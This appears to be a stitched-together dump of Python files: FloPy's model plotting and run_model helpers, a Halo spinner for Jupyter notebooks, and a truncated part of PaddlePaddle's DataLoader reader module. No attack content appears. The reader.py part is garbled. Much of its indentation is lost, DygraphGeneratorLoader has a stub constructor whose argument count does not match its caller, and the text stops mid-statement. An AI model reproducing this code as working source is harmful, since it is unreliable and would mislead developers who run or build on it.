            MODFLOW zero-based stress period number to return.
            (default is zero)
        key : str
            MfList dictionary key. (default is None)

    Returns
    -------
    axes : list
        Empty list is returned if filename_base is not None. Otherwise
        a list of matplotlib.pyplot.axis are returned.

    Examples
    --------
    >>> import flopy
    >>> ml = flopy.modflow.Modflow.load('test.nam')
    >>> ml.plot()
    """
    # pop supported keyword arguments, falling back to their defaults
    kper = int(kwargs.pop('kper', 0))
    mflay = kwargs.pop('mflay', None)
    fileb = kwargs.pop('filename_base', None)
    fext = kwargs.pop('file_extension', 'png').replace('.', '')
    key = kwargs.pop('key', None)

    if self.verbose:
        print('\nPlotting Packages')

    axes = []
    ifig = 0

    def _collect(caxs):
        # unroll nested lists of axes into the single flat `axes` list
        if isinstance(caxs, list):
            axes.extend(caxs)
        else:
            axes.append(caxs)

    if SelPackList is None:
        # plot every package in the model
        for p in self.packagelist:
            caxs = p.plot(initial_fig=ifig,
                          filename_base=fileb, file_extension=fext,
                          kper=kper, mflay=mflay, key=key)
            _collect(caxs)
            # update next active figure number
            ifig = len(axes) + 1
    else:
        # plot only the requested packages, matched by name
        for pon in SelPackList:
            for i, p in enumerate(self.packagelist):
                if pon in p.name:
                    if self.verbose:
                        print(' Plotting Package: ', p.name[0])
                    caxs = p.plot(initial_fig=ifig,
                                  filename_base=fileb, file_extension=fext,
                                  kper=kper, mflay=mflay, key=key)
                    _collect(caxs)
                    # update next active figure number
                    ifig = len(axes) + 1
                    break
    if self.verbose:
        print(' ')
    return axes
def to_shapefile(self, filename, package_names=None, **kwargs):
    """
    Wrapper function for writing a shapefile for the model grid. If
    package_names is not None, then search through the requested packages
    looking for arrays that can be added to the shapefile as attributes.

    .. deprecated::
        Use :meth:`export` instead.

    Parameters
    ----------
    filename : string
        name of the shapefile to write
    package_names : list of package names (e.g. ["dis","lpf"])
        Packages to export data arrays to shapefile. (default is None)

    Returns
    -------
    None

    Examples
    --------
    >>> import flopy
    >>> m = flopy.modflow.Modflow()
    >>> m.to_shapefile('model.shp', SelPackList)
    """
    import warnings
    # emit with the proper category so filters/tools recognize it as a
    # deprecation (the default UserWarning hides the intent)
    warnings.warn("to_shapefile() is deprecated. use .export()",
                  DeprecationWarning)
    self.export(filename, package_names=package_names)
    return
def run_model(exe_name, namefile, model_ws='./',
              silent=False, pause=False, report=False,
              normal_msg='normal termination', use_async=False,
              cargs=None):
    """
    Run the model using subprocess.Popen, optionally communicating with
    the model's stdout asynchronously and reporting progress to the
    screen with timestamps.

    Parameters
    ----------
    exe_name : str
        Executable name (with path, if necessary) to run.
    namefile : str
        Namefile of model to run. The namefile must be the
        filename of the namefile without the path. Namefile can be None
        to allow programs that do not require a control file (name file)
        to be passed as a command line argument.
    model_ws : str
        Path to the location of the namefile. (default is the
        current working directory - './')
    silent : boolean
        Echo run information to screen (default is True).
    pause : boolean, optional
        Pause upon completion (default is False).
    report : boolean, optional
        Save stdout lines to a list (buff) which is returned
        by the method. (default is False).
    normal_msg : str or list of str
        Normal termination message(s) used to determine if the
        run terminated normally. (default is 'normal termination')
    use_async : boolean
        asynchronously read model stdout and report with timestamps. good for
        models that take long time to run. not good for models that run
        really fast
    cargs : str or list of strings
        additional command line arguments to pass to the executable.
        Default is None

    Returns
    -------
    (success, buff)
    success : boolean
    buff : list of lines of stdout
    """
    success = False
    buff = []

    # convert normal_msg to a list of lower-case strings so one or many
    # termination messages can be checked uniformly
    if isinstance(normal_msg, str):
        normal_msg = [normal_msg.lower()]
    elif isinstance(normal_msg, list):
        for idx, s in enumerate(normal_msg):
            normal_msg[idx] = s.lower()

    # Check to make sure that program and namefile exist
    exe = which(exe_name)
    if exe is None:
        import platform
        # on Windows, retry the lookup with an explicit .exe extension
        if platform.system() in 'Windows':
            if not exe_name.lower().endswith('.exe'):
                exe = which(exe_name + '.exe')
    if exe is None:
        s = 'The program {} does not exist or is not executable.'.format(
            exe_name)
        raise Exception(s)
    else:
        if not silent:
            s = 'FloPy is using the following ' + \
                ' executable to run the model: {}'.format(exe)
            print(s)

    if namefile is not None:
        if not os.path.isfile(os.path.join(model_ws, namefile)):
            s = 'The namefile for this model ' + \
                'does not exists: {}'.format(namefile)
            raise Exception(s)

    # simple little function for the thread to target: forward each stdout
    # line to the queue until EOF (b'')
    def q_output(output, q):
        for line in iter(output.readline, b''):
            q.put(line)

    # create a list of arguments to pass to Popen
    argv = [exe_name]
    if namefile is not None:
        argv.append(namefile)

    # add additional arguments to Popen arguments
    if cargs is not None:
        if isinstance(cargs, str):
            cargs = [cargs]
        for t in cargs:
            argv.append(t)

    # run the model with Popen
    proc = sp.Popen(argv,
                    stdout=sp.PIPE, stderr=sp.STDOUT, cwd=model_ws)

    if not use_async:
        # synchronous mode: read stdout line by line until EOF
        while True:
            line = proc.stdout.readline()
            c = line.decode('utf-8')
            if c != '':
                for msg in normal_msg:
                    if msg in c.lower():
                        success = True
                        break
                c = c.rstrip('\r\n')
                if not silent:
                    print('{}'.format(c))
                if report:
                    buff.append(c)
            else:
                break
        return success, buff

    # some tricks for the async stdout reading
    q = Queue.Queue()
    thread = threading.Thread(target=q_output, args=(proc.stdout, q))
    thread.daemon = True
    thread.start()

    failed_words = ["fail", "error"]
    last = datetime.now()
    lastsec = 0.
    while True:
        try:
            line = q.get_nowait()
        except Queue.Empty:
            pass
        else:
            if line == '':
                break
            line = line.decode().lower().strip()
            if line != '':
                now = datetime.now()
                dt = now - last
                tsecs = dt.total_seconds() - lastsec
                line = "(elapsed:{0})-->{1}".format(tsecs, line)
                lastsec = tsecs + lastsec
                buff.append(line)
                if not silent:
                    print(line)
                for fword in failed_words:
                    if fword in line:
                        success = False
                        break
        if proc.poll() is not None:
            break
    proc.wait()
    thread.join(timeout=1)
    # drain any remaining stdout; readlines() returns bytes, so decode and
    # normalize before mixing with the str lines already in buff
    buff.extend(l.decode().lower().strip() for l in proc.stdout.readlines())
    proc.stdout.close()
    for line in buff:
        # normal_msg is a list of lower-case strings at this point, so test
        # each message individually (`normal_msg in line` raised TypeError)
        if any(msg in line for msg in normal_msg):
            print("success")
            success = True
            break

    if pause:
        input('Press Enter to continue...')
    return success, buff
|
halo_notebook.py | from __future__ import absolute_import, print_function, unicode_literals
import sys
import threading
import cursor
from ..halo import Halo
from ..halo._utils import (colored_frame, decode_utf_8_text)
class HaloNotebook(Halo):
    """Halo spinner that renders inside a Jupyter notebook.

    Frames are written into an ipywidgets ``Output`` widget rather than
    directly to a terminal stream, so the spinner animates correctly in
    notebook cells.
    """

    def __init__(self, text='', color='cyan', text_color=None, spinner=None,
                 placement='left', animation=None, interval=-1, enabled=True,
                 stream=sys.stdout):
        """Initialize the spinner and create its notebook output widget.

        Parameters mirror :class:`Halo`; they are forwarded unchanged.
        """
        super(HaloNotebook, self).__init__(text=text,
                                           color=color,
                                           text_color=text_color,
                                           spinner=spinner,
                                           placement=placement,
                                           animation=animation,
                                           interval=interval,
                                           enabled=enabled,
                                           stream=stream)
        self.output = self._make_output_widget()

    def _make_output_widget(self):
        # imported lazily so the module can be imported without ipywidgets
        from ipywidgets.widgets import Output
        return Output()

    # TODO: using property and setter
    def _output(self, text=''):
        # build a raw notebook "stream" output tuple for the Output widget
        return ({'name': 'stdout', 'output_type': 'stream', 'text': text},)

    def clear(self):
        """Clear the current frame from the output widget.

        Returns
        -------
        self
        """
        if not self._enabled:
            return self
        with self.output:
            self.output.outputs += self._output('\r')
            self.output.outputs += self._output(self.CLEAR_LINE)
        self.output.outputs = self._output()
        return self

    def _render_frame(self):
        # append the next animation frame to the widget output
        frame = self.frame()
        output = '\r{0}'.format(frame)
        with self.output:
            self.output.outputs += self._output(output)

    def start(self, text=None):
        """Start the spinner thread and display the output widget.

        Parameters
        ----------
        text : str, optional
            Replacement spinner text.

        Returns
        -------
        self
        """
        if text is not None:
            self.text = text
        if not self._enabled or self._spinner_id is not None:
            return self
        if self._stream.isatty():
            cursor.hide()

        self.output = self._make_output_widget()
        from IPython.display import display
        display(self.output)
        self._stop_spinner = threading.Event()
        self._spinner_thread = threading.Thread(target=self.render)
        # daemon thread so the spinner never blocks interpreter shutdown
        # (Thread.setDaemon is deprecated since Python 3.10)
        self._spinner_thread.daemon = True
        self._render_frame()
        self._spinner_id = self._spinner_thread.name
        self._spinner_thread.start()
        return self

    def stop_and_persist(self, symbol=' ', text=None):
        """Stops the spinner and persists the final frame to be shown.

        Parameters
        ----------
        symbol : str, optional
            Symbol to be shown in final frame
        text: str, optional
            Text to be shown in final frame

        Returns
        -------
        self
        """
        if not self._enabled:
            return self

        symbol = decode_utf_8_text(symbol)
        if text is not None:
            text = decode_utf_8_text(text)
        else:
            text = self._text['original']
        text = text.strip()

        if self._text_color:
            text = colored_frame(text, self._text_color)

        self.stop()

        # place the symbol on the side configured at construction time
        if self._placement == 'right':
            output = '\r{0} {1}\n'.format(text, symbol)
        else:
            output = '\r{0} {1}\n'.format(symbol, text)

        with self.output:
            self.output.outputs = self._output(output)
|
reader.py | # Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from . import core
import sys
import six
import numpy as np
import threading
import paddle
from .framework import Program, Variable, program_guard, default_main_program, default_startup_program, in_dygraph_mode, cpu_places, _current_expected_place
from .executor import global_scope
from .data_feeder import DataFeeder, BatchedTensorProvider
from .multiprocess_utils import multiprocess_queue_set, CleanupFuncRegistrar, _cleanup_mmap, _cleanup, _set_SIGCHLD_handler
from .dataloader import BatchSampler, Dataset, IterableDataset
from .dataloader.dataloader_iter import _DataLoaderIterSingleProcess, _DataLoaderIterMultiProcess, _DatasetKind, default_collate_fn
from .dataloader.batch_sampler import _InfiniteIterableSampler
from .layers.io import monkey_patch_reader_methods, _copy_reader_var_, double_buffer
from .unique_name import UniqueNameGenerator
import logging
import warnings
### Dygraph DataLoader configs ###
import os
import multiprocessing
import signal
# NOTE: queue has a different name in python2 and python3
if six.PY2:
import Queue as queue
else:
import queue
# NOTE: [ avoid hanging & fail quickly ] Seconds to wait when fetching data
# from another (worker) process before assuming the worker has died.
QUEUE_GET_TIMEOUT = 60

# Public API of this module.
__all__ = ['PyReader', 'DataLoader', 'default_collate_fn']

# Generates unique names for internally created reader variables and queues.
data_loader_unique_name_generator = UniqueNameGenerator()

# Module-level flags, read and written through the accessor functions
# keep_data_loader_order() and use_pinned_memory().
KEEP_DATA_LOADER_ORDER = True
USE_PINNED_MEMORY = None
def keep_data_loader_order(*args):
    """Getter/setter for the global ``KEEP_DATA_LOADER_ORDER`` flag.

    Called with no arguments, returns the current flag value. Called with
    a single bool, updates the flag (and returns None).
    """
    global KEEP_DATA_LOADER_ORDER
    if args:
        assert len(args) == 1 and isinstance(args[0], bool)
        KEEP_DATA_LOADER_ORDER = args[0]
    else:
        return KEEP_DATA_LOADER_ORDER
def use_pinned_memory(*args):
    """Getter/setter for the global ``USE_PINNED_MEMORY`` flag.

    Called with no arguments, returns the current flag value. Called with
    a single bool, updates the flag (and returns None).
    """
    global USE_PINNED_MEMORY
    if args:
        assert len(args) == 1 and isinstance(args[0], bool)
        USE_PINNED_MEMORY = args[0]
    else:
        return USE_PINNED_MEMORY
def _convert_places(places):
    """Normalize `places` into a list of ``core.Place`` objects.

    A single place (or anything not already a list/tuple) is wrapped in a
    list first; each entry that is not already a ``core.Place`` is wrapped
    in one via ``set_place``.
    """
    if not isinstance(places, (list, tuple)):
        places = [places]

    converted = []
    for place in places:
        if not isinstance(place, core.Place):
            wrapped = core.Place()
            wrapped.set_place(place)
            place = wrapped
        converted.append(place)
    return converted
# NOTE(chenweihang): _reader_process_loop must be top level method to be pickled
def _reader_process_loop(batch_reader, data_queue):
    """Worker-process loop: convert each batch from `batch_reader` to a
    tensor list and push it into `data_queue`, ending with a None sentinel.
    """
    try:
        # set signal handler
        core._set_process_signal_handler()

        # NOTE: [ mmap files clear ] When the child process exits unexpectedly,
        # some shared memory objects may have been applied for but have not yet
        # been put into the inter-process Queue. This part of the object needs
        # to be cleaned up when the process ends.
        CleanupFuncRegistrar.register(_cleanup_mmap)

        for batch in batch_reader():
            tensor_list = core._convert_to_tensor_list(batch)
            data_queue.put(tensor_list)
            # drop this process's mmap fds for the tensors just queued
            core._remove_tensor_list_mmap_fds(tensor_list)
        # None tells the consumer that the reader is exhausted
        data_queue.put(None)
    except KeyboardInterrupt:
        # NOTE: Main process will raise KeyboardInterrupt anyways, ignore it in child process
        pass
    except:
        # re-raise any other error so the parent can observe the failure
        six.reraise(*sys.exc_info())
class DataLoaderBase(object):
    """Abstract base class for DataLoader implementations.

    Subclasses must implement the iterator protocol (`__iter__` and
    `__next__`).
    """

    def __init__(self):
        # places the loaded data should be converted to; set by subclasses
        self._places = None

    def __call__(self):
        # calling a loader returns the (iterable) loader itself
        return self

    def next(self):
        '''
        Get the next item in the DataLoader object. This method
        should not be called by users directly. It is used for
        implementing iterator protocol of Python 2.x inside
        PaddlePaddle framework.
        '''
        return self.__next__()

    def __iter__(self):
        raise NotImplementedError()

    def __next__(self):
        raise NotImplementedError()

    @classmethod
    def _check_input_array(cls, item):
        """Convert `item` to an ndarray, rejecting ragged (object) arrays."""
        arr = np.asarray(item)
        # NOTE: the `np.object` alias was removed in NumPy 1.24; the builtin
        # `object` is the equivalent dtype to test for ragged input
        if arr.dtype == object:
            raise TypeError(
                "\n\tFaild to convert input data to a regular ndarray :\n\t* Usually "
                "this means the input data contains nested lists with different lengths. "
                "\n\t* Check the reader function passed to 'decorate_batch_generator'"
                " to locate the data causes this issue.\n\t* Please consider using "
                "'fluid.create_lod_tensor' to convert it to a LoD-Tensor.")
        return arr
class DataLoader(object):
"""
DataLoader provides an iterator which iterates the given dataset
once by the batch_sampler.
DataLoader supports single-process and multi-process data loading,
multi-process workers will be used to load data asynchronously if
:attr:`num_workers` is set as a positive number.
DataLoader only supports map-style dataset(can get a sample from
dataset with a given index) currently, for a map-style dataset,
please see :code:`paddle.io.Dataset`.
batch_sampler please see :code:`paddle.io.BatchSampler`
Args:
dataset(Dataset): the dataset to load data from, should be an
instance of subclass of :code:`paddle.io.Dataset` or
:code:`paddle.io.IterableDataset`.
feed_list (list(Tensor)|tuple(Tensor)): feed variable list.
The variables should be created by :code:`fluid.data()`.
:attr:`feed_list` must be set if :attr:`return_list` is
False. Default None.
places(list(Place)|tuple(Place)): a list of Place, to put data
onto, :attr:`places` must be set in both static graph and
dynamic graph mode, in dynamic graph mode, place number must
be 1. Default None.
return_list (bool): whether the return value on each device is
presented as a list. If :attr:`return_list=False`, the return
value on each device would be a dict of str -> LoDTensor, where
the key of the dict is the name of each fed variables. If
:attr:`return_list=True`, the return value on each device would
be a list(LoDTensor). :attr:`return_list` can only be True
in dynamic graph mode. Default False.
batch_sampler(BatchSampler): an instance of `paddle.io.BatchSampler`
to generate batch indices to draw samples from :attr:`dataset`
and combine a batch. Default None.
batch_size(int): sample number in a mini-batch, a substitution
parameter for :attr:`batch_sampler`, if :attr:`batch_sampler`
is not set, a default `paddle.io.BatchSampler` will be used
and initialize by :attr:`batch_size`, :attr:`shuffle` and
:attr:`drop_last`. Default 1.
shuffle(bool): whether to shuffle indices order before generating
batch indices, a substitution parameter for :attr:`batch_sampler`
see :attr:`batch_size`. Default False.
drop_last(bool): whether drop the last incomplete batch dataset size
is not divisible by the batch size, a substitution parameter
for :attr:`batch_sampler`, see :attr:`batch_size`. Default False
collate_fn(callable): function to generate mini-batch data by merging
the sample list, None for only stack each fields of sample in axis
0(same as :attr::`np.stack(..., axis=0)`). Default None
num_workers(int): the number of subprocess to load data, 0 for no
subprocess used and loading data in main process. Default 0
use_buffer_reader (bool): whether to use bufferred reader.
If use_buffer_reader=True, the DataLoader would prefetch next
batch data asynchronously, so it would speed up data feeding
and occupies a little more CPU or GPU memory, i.e., the memory
of one batch input data. Default True.
use_shared_memory (bool): whether to use shared memory to speed up
putting data into inter-process queue, set :attr:`use_shared_memory`
as True only when the shared memory space on your machine(e.g.
space of '/dev/shm' on Linux operating system) is large enough.
Shared memory will only be enabled in multi-process mode(num_workers
> 0). Default True.
timeout(int): the timeout value for getting data from the output queue
of subprocesses. Default 0.
worker_init_fn(callable): init function which will be called with
worker id on each subprocess starting if not set as None. Default
None.
Returns:
DataLoader: an iterable object for data iterating
Examples:
.. code-block:: python
import numpy as np
import paddle.fluid as fluid
from paddle.io import Dataset, BatchSampler, DataLoader
BATCH_NUM = 20
BATCH_SIZE = 16
EPOCH_NUM = 4
IMAGE_SIZE = 784
CLASS_NUM = 10
USE_GPU = False # whether use GPU to run model
# define a random dataset
class RandomDataset(Dataset):
def __init__(self, num_samples):
self.num_samples = num_samples
def __getitem__(self, idx):
image = np.random.random([IMAGE_SIZE]).astype('float32')
label = np.random.randint(0, CLASS_NUM - 1, (1, )).astype('int64')
return image, label
def __len__(self):
return self.num_samples
# get places
places = fluid.cuda_places() if USE_GPU else fluid.cpu_places()
# -------------------- static graph ---------------------
def simple_net(image, label):
fc_tmp = fluid.layers.fc(image, size=CLASS_NUM, act='softmax')
cross_entropy = fluid.layers.softmax_with_cross_entropy(image, label)
loss = fluid.layers.reduce_mean(cross_entropy)
sgd = fluid.optimizer.SGD(learning_rate=1e-3)
sgd.minimize(loss)
return loss
image = fluid.data(name='image', shape=[None, IMAGE_SIZE], dtype='float32')
label = fluid.data(name='label', shape=[None, 1], dtype='int64')
loss = simple_net(image, label)
exe = fluid.Executor(places[0])
exe.run(fluid.default_startup_program())
prog = fluid.CompiledProgram(fluid.default_main_program()).with_data_parallel(loss_name=loss.name)
dataset = RandomDataset(BATCH_NUM * BATCH_SIZE)
loader = DataLoader(dataset,
feed_list=[image, label],
places=places,
batch_size=BATCH_SIZE,
shuffle=True,
drop_last=True,
num_workers=2)
for e in range(EPOCH_NUM):
for i, data in enumerate(loader()):
l = exe.run(prog, feed=data, fetch_list=[loss], return_numpy=True)
print("Epoch {} batch {}: loss = {}".format(e, i, l[0][0]))
# -------------------------------------------------------
# --------------------- dygraph mode --------------------
class SimpleNet(fluid.dygraph.Layer):
def __init__(self):
super(SimpleNet, self).__init__()
self.fc = fluid.dygraph.nn.Linear(IMAGE_SIZE, CLASS_NUM, act='softmax')
def forward(self, image, label=None):
return self.fc(image)
with fluid.dygraph.guard(places[0]):
simple_net = SimpleNet()
opt = fluid.optimizer.SGD(learning_rate=1e-3,
parameter_list=simple_net.parameters())
loader = DataLoader(dataset,
places=places[0],
batch_size=BATCH_SIZE,
shuffle=True,
drop_last=True,
num_workers=2)
for e in range(EPOCH_NUM):
for i, (image, label) in enumerate(loader()):
out = simple_net(image)
loss = fluid.layers.cross_entropy(out, label)
avg_loss = fluid.layers.reduce_mean(loss)
avg_loss.backward()
opt.minimize(avg_loss)
simple_net.clear_gradients()
print("Epoch {} batch {}: loss = {}".format(e, i, np.mean(loss.numpy())))
# -------------------------------------------------------
.. note::
For reading iterable dataset with multiprocess Dataloader,
please see :code:`paddle.io.IterableDataset`
"""
def __init__(self,
             dataset,
             feed_list=None,
             places=None,
             return_list=False,
             batch_sampler=None,
             batch_size=1,
             shuffle=False,
             drop_last=False,
             collate_fn=None,
             num_workers=0,
             use_buffer_reader=True,
             use_shared_memory=True,
             timeout=0,
             worker_init_fn=None):
    """Validate arguments and build the batch sampler for this loader.

    See the class docstring for the meaning of each parameter.
    """
    self.return_list = return_list
    self.collate_fn = collate_fn
    self.use_buffer_reader = use_buffer_reader
    self.worker_init_fn = worker_init_fn

    assert isinstance(dataset, Dataset), \
        "dataset should be subclass instance of paddle.io.Dataset"
    self.dataset = dataset

    # static graph mode returning dict-style values needs the feed
    # variables to name the dict keys
    if not return_list and not in_dygraph_mode():
        assert feed_list is not None, \
            "feed_list should be set when return_list=False"
    self.feed_list = feed_list

    assert places is not None, "places cannot be None"
    self.places = _convert_places(places)
    if in_dygraph_mode():
        assert len(self.places) == 1, \
            "Number of places must be 1 in dygraph mode"

    assert num_workers >= 0, "num_workers should be a non-negative value"
    # multi-process loading is Linux-only; silently fall back elsewhere
    if num_workers > 0 and (sys.platform == 'darwin' or
                            sys.platform == 'win32'):
        warnings.warn(
            "DataLoader with multi-process mode is not supported on MacOs and Windows currently." \
            " Please use signle-process mode with num_workers = 0 instead")
        num_workers = 0
    self.num_workers = num_workers

    # shared memory only pays off when worker subprocesses are used
    self.use_shared_memory = use_shared_memory
    if use_shared_memory and num_workers == 0:
        self.use_shared_memory = False

    assert timeout >= 0, "timeout should be a non-negative value"
    self.timeout = timeout

    if isinstance(dataset, IterableDataset):
        self.dataset_kind = _DatasetKind.ITER
        # iterable datasets cannot be indexed, so shuffling and custom
        # batch samplers are rejected
        if shuffle:
            raise ValueError(
                "IterableDataset not support shuffle, but got shuffle={}".
                format(shuffle))
        if batch_sampler is not None:
            raise ValueError(
                "IterableDataset expect unspecified batch_sampler")
    else:
        self.dataset_kind = _DatasetKind.MAP

    if batch_sampler is not None:
        assert isinstance(batch_sampler, BatchSampler), \
            "batch_sampler should be None or subclass instance " \
            "of paddle.io.BatchSampler"
        # an explicit batch_sampler fully determines batching, so the
        # shortcut arguments must be left at their defaults
        assert batch_size == 1 and not shuffle and not drop_last, \
            "batch_size/shuffle/drop_last should not be set when " \
            "batch_sampler is given"
        self.batch_sampler = batch_sampler
    else:
        assert batch_size is not None and batch_size > 0, \
            "batch_size should be a positive value when " \
            "batch_sampler is not given"
        if isinstance(dataset, IterableDataset):
            self.batch_sampler = _InfiniteIterableSampler(dataset,
                                                          batch_size)
        else:
            self.batch_sampler = BatchSampler(
                dataset=dataset,
                batch_size=batch_size,
                shuffle=shuffle,
                drop_last=drop_last)

    # dygraph defaults to pinned memory unless use_pinned_memory() was
    # explicitly set by the user
    self.pin_memory = False
    if in_dygraph_mode():
        self.pin_memory = True if use_pinned_memory(
        ) is None else use_pinned_memory()
def __len__(self):
return len(self.batch_sampler)
def __iter__(self):
    """Create a fresh iterator over the dataset for one epoch."""
    # single-process iteration when no workers are configured,
    # multi-process iteration otherwise
    if self.num_workers > 0:
        return _DataLoaderIterMultiProcess(self)
    return _DataLoaderIterSingleProcess(self)
def __call__(self):
    """Calling the loader is equivalent to iterating it."""
    return iter(self)
@staticmethod
def from_generator(feed_list=None,
                   capacity=None,
                   use_double_buffer=True,
                   iterable=True,
                   return_list=False,
                   use_multiprocess=False,
                   drop_last=True):
    """
    Create a DataLoader object for loading data from a Python generator.

    Data is prefetched by a Python thread and pushed into a queue
    asynchronously. The framework ensures that the data loading order of
    the returned DataLoader is exactly the same as the user-defined data
    source.

    The created DataLoader object provides three methods to set the data
    source: :code:`set_sample_generator`, :code:`set_sample_list_generator`
    and :code:`set_batch_generator`.

    If iterable = True, the created DataLoader object is a Python
    generator object, iterable with a for-range loop. If iterable =
    False, the object instead provides :code:`start()` and
    :code:`reset()` methods to control the data reading process; this
    mode is compatible with the :code:`fluid.layers.py_reader` interface.

    Args:
        feed_list (list(Variable)|tuple(Variable)): feed variable list.
            The variables should be created by :code:`fluid.data()`.
        capacity (int): capacity of the queue maintained in DataLoader,
            in units of batches. Set a larger capacity if your reader
            is fast.
        use_double_buffer (bool): whether to use double_buffer_reader,
            which prefetches the next batch asynchronously at the cost
            of the memory of one extra batch of input data.
        iterable (bool): whether the created DataLoader is iterable.
        return_list (bool): whether the return value on each device is
            presented as a list(LoDTensor) rather than a dict of
            str -> LoDTensor keyed by fed variable names. Only valid
            when iterable=True. Recommended: False in static graph mode,
            True in dygraph mode.
        use_multiprocess (bool): whether to use multi-process to speed up
            data loading in dygraph mode; has no effect in static graph
            mode. Default False.
        drop_last (bool): whether to drop the last batches whose number
            is less than the CPU core/GPU card number. Keep the default
            True during training; set False only for inference so the
            remainder batches can still be evaluated.

    Returns:
        loader (DataLoader): the created DataLoader object.
    """
    # dygraph mode has a dedicated loader implementation (which does not
    # take drop_last); static graph mode uses the generic GeneratorLoader
    if in_dygraph_mode():
        return DygraphGeneratorLoader(feed_list, capacity,
                                      use_double_buffer, iterable,
                                      return_list, use_multiprocess)
    return GeneratorLoader(feed_list, capacity, use_double_buffer,
                           iterable, return_list, drop_last)
@staticmethod
def from_dataset(dataset, places, drop_last=True):
    """
    Create an iterable DataLoader object for loading data from a
    Dataset. Dataset is only supported in Linux systems currently.

    Args:
        dataset (InMemoryDataset|QueueDataset): the dataset object.
        places (list(CUDAPlace)|list(CPUPlace)): places where the result
            data should be converted.
        drop_last (bool): whether to drop the last batch whose sample
            number is less than the batch size. If drop_last = True it
            is dropped; otherwise it is kept.

    Returns:
        loader (DataLoader): the created DataLoader object, which can be
        treated as a Python generator.
    """
    return DatasetLoader(dataset, places, drop_last)
class DygraphGeneratorLoader(DataLoaderBase):
    """
    The GeneratorLoader of dygraph.

    The multiprocess dygraph GeneratorLoader's most functions are different
    from the static graph GeneratorLoader; it is implemented separately to
    keep the code readable.
    """

    def __init__(self,
                 feed_list=None,
                 capacity=None,
                 use_double_buffer=True,
                 iterable=True,
                 return_list=False):
        pass
class GeneratorLoader(DataLoaderBase):
def __init__(self,
feed_list=None,
capacity=None,
use_double_buffer=True,
iterable=True,
return_list=False,
drop_last=True):
self._tensor_reader = None
self._places = None
self._thread = None
self._queue = None
self._feed_list = feed_list
self._exited = False
self._drop_last = drop_last
self._keep_order = keep_data_loader_order()
if not capacity:
raise ValueError("Please give value to capacity.")
self._iterable = iterable
self._return_list = return_list
if not self._feed_list:
raise Exception("Feed list must be given under static mode.")
self._use_double_buffer = use_double_buffer
self._capacity = capacity
if not self._iterable:
self._init_non_iterable()
def _wait_thread_ends(self):
# Get self._thread first to prevent data race, because __thread_main__
# would set self._thread be None at the end
thread = self._thread
if thread is not None and self._iterable:
self._queue.close()
thread.join()
def _init_iterable(self):
self._wait_thread_ends()
self._var_names = [v.name for v in self._feed_list]
self._shapes = [v.shape for v in self._feed_list]
self._dtypes = [v.dtype for v in self._feed_list]
self._need_check_feed = [
v.desc.need_check_feed() for v in self._feed_list
]
self._queue = core.init_lod_tensor_blocking_queue(
core.Variable(), self._capacity, self._keep_order)
self._reader = None
self._reader = core.create_py_reader(
self.queue, self._var_names, self._shapes, self._dtypes,
self._need_check_feed, self._places, self._use_double_buffer,
self._drop_last, False)
def _init_non_iterable(self):
lod_levels = []
dtypes = []
shape_concat = []
ranks = []
shapes = []
need_check_feed = []
for feed_data in self._feed_list:
dtypes.append(feed_data.dtype)
shape_concat.extend(feed_data.shape)
ranks.append(len(feed_data.shape))
shapes.append(feed_data.shape)
lod_levels.append(feed_data.lod_level)
need_check_feed.append(int(feed_data.desc.need_check_feed()))
queue_name = data_loader_unique_name_generator(
'lod_tensor_blocking_queue')
reader_name = data_loader_unique_name_generator('create_py_reader')
double_buffer_name = data_loader_unique_name_generator('double_buffer')
var = global_scope().var(queue_name)
self._queue = core.init_lod_tensor_blocking_queue(var, self._capacity,
self._keep_order)
if self._keep_order:
block = default_main_program().current_block()
else:
block = default_startup_program().current_block()
reader_var = block.create_var(name=reader_name)
dtype_int = [int(t) for t in dtypes]
block.append_op(
type='create_py_reader',
inputs={'blocking_queue': [queue_name]},
outputs={'Out': [reader_var]},
attrs={
'shape_concat': shape_concat,
'lod_levels': lod_levels,
'dtypes': dtype_int,
'need_check_feed': need_check_feed,
'ranks': ranks
})
reader_var.desc.set_dtypes(dtypes)
reader_var.persistable = True
reader_var.stop_gradient = True
if self._keep_order:
main_prog_var = reader_var
reader = main_prog_var
reader.reset = self._queue.reset
else:
main_prog_var = _copy_reader_var_(
default_main_program().current_block(), reader_var)
main_prog_var.stop_gradient = True
main_prog_var.persistable = True
reader = monkey_patch_reader_methods(main_prog_var)
if self._use_double_buffer:
double_buffer_reader = double_buffer(
reader, name=double_buffer_name)
# we return a double buffer reader. However, the reset method comes from
# py_reader.
double_buffer_reader.reset = reader.reset
reader = double_buffer_reader
self._reader = reader
default_main_program().current_block().append_op(
type='read',
inputs={'Reader': [self._reader]},
outputs={'Out': self._feed_list},
attrs={'drop_last': self._drop_last})
@property
def queue(self):
return self._queue
@property
def iterable(self):
return self._iterable
def __iter__(self):
assert self.iterable, "DataLoader is not iterable"
assert self._tensor_reader is not None, \
"Data source of DataLoader has not set yet"
self._init_iterable()
self._start()
return self
def __next__(self):
try:
if self._return_list:
return self._reader.read_next_list()
else:
return self._reader.read_next()
except StopIteration:
self._queue.close()
self._reset()
six.reraise(*sys.exc_info())
def start(self):
assert not self._iterable, "start() cannot be called when DataLoader is iterable"
self._start()
def reset(self):
assert not self._iterable, "reset() cannot be called when DataLoader is iterable"
self._reset()
def _start(self):
def __thread_main__():
try:
while not self._queue.wait_for_inited(1):
if self._exited:
return
for tensors in self._tensor_reader():
array = core.LoDTensorArray()
for item in tensors:
if not isinstance(item, core.LoDTensor):
item = self._check_input_array(item)
tmp = core.LoDTensor()
tmp.set(item, core.CPUPlace())
item = tmp
array.append(item)
if not self._queue.push(array):
break
self._queue.close()
self._thread = None
except Exception as ex:
self._queue.kill()
self._thread = None
logging.warn('Your reader has raised an exception!')
six.reraise(*sys.exc_info())
self._thread = threading.Thread(target=__thread_main__)
self._thread.daemon = True
self._thread.start()
def _reset(self):
self._queue.close()
self._exited = True
thread = self._thread
if thread is not None:
thread.join()
self._exited = False
self._reader.reset()
def set_sample_generator(self,
reader,
batch_size,
drop_last=True,
places=None):
assert batch_size > 0, "batch_size must be larger than 0"
has_lod = False
for f in self._feed_list:
if f.lod_level != 0:
has_lod = True
break
if has_lod:
self.set_sample_list_generator(
paddle.batch(
